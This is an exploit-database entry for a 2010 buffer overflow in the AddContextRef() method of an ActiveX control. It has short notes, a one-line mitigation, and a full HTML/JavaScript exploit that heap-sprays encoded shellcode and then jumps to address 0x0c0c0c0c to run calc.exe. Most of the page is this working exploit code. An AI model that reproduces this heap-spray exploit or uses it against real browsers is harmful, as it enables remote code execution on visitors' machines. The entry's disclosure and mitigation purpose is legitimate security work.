header-logo
Suggest Exploit
vendor:
N/A
by:
牛奶坦克
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Exploit-DB Notes

This exploit is a buffer overflow vulnerability in the AddContextRef() method of the ActiveX control with CLSID 2745E5F5-D234-11D0-847A-00C04FD7BB08. The exploit uses a shellcode to run calc.exe. The exploit first creates a big block of memory and then fills it with the shellcode. It then creates an array of 350 elements, each element containing the block of memory with the shellcode. Finally, it calls the AddContextRef() method with the address 0x0c0c0c0c, which is the address of the first element of the array.

Mitigation:

Disable the ActiveX control with CLSID 2745E5F5-D234-11D0-847A-00C04FD7BB08.
Source

Exploit-DB raw data:

Exploit-DB Notes:
Original credit goes to "牛奶坦克" via WooYun:
http://www.wooyun.org/bugs/wooyun-2010-01006

<html>

<object classid="clsid:2745E5F5-D234-11D0-847A-00C04FD7BB08" id="target"></object>



<SCRIPT language="JavaScript">

//run calc.exe

var shellcode = unescape("%uc92b%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u0c13%u452b%u83df%ufceb%uf4e2%uc3f0%udf01%u2b0c%u9ace%ua030%uda39%u2a74%u54aa%u3343%u80ce%u2a2c%u96ae%u1f87%udece%u1ae2%u4685%uafa0%uab85%uea0b%ud28f%ue90d%u2bae%u7f37%udb61%uce79%u80ce%u2a28%ub9ae%u2787%u540e%u3753%u3444%u3787%udece%ua2e7%ufb19%ue808%u1f74%ua068%uef05%ueb89%ud33d%u6b87%u5449%u377c%u54e8%u2364%ud6ae%uab87%udff5%u2b0c%ub7ce%u7430%u2974%u7d6c%u27cc%ueb8f%u8f3e%udb64%udbcf%u4353%u21dd%u2586%u2012%u48eb%ub324%u2b6f%udf45%u0000");



//先喷好堆

var bigblock = unescape("%u0C0C%u0C0C");

var headersize = 20;

var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (x=0; x<350; x++) memory[x] = block +shellcode;



//让程序直接call过去

target.AddContextRef(0x0c0c0c0c);

</script>

</html>

Navigation

Suggest Exploit

Services By CQR